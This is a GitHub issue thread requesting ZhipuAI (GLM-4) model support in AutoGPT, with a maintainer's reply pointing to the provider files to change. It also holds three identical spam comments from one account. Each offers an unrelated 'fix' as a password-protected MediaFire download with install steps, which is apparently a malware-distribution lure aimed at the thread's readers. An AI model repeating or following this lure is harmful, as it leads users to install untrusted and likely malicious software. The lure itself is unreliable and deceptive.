### ISSUE TITLE
Add ZhipuAI models support

### ISSUE THREAD

**Issue by twinsant** [Significant-Gravitas/AutoGPT#7933]
### Duplicates

- [X] I have searched the existing issues

### Summary 💡

[ZhipuAi](https://open.bigmodel.cn/) is one of the LLMs providers in China, also named China's OpenAI.

Supporting it will gain a lot of Chinese users, maybe.

### Motivation 🔦

GLM-4-Flash model api is free now :D

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ntindle** [comment]
There's two places to update it for.

Old autogpt is in the providers in forge forge/forge/llm/providers and you'll need to implement a new provider there. Take a look at a few of the other providers there for more details on it

New AutoGPT uses rnd/autogpt_server/autogpt_server/blocks/llm.py
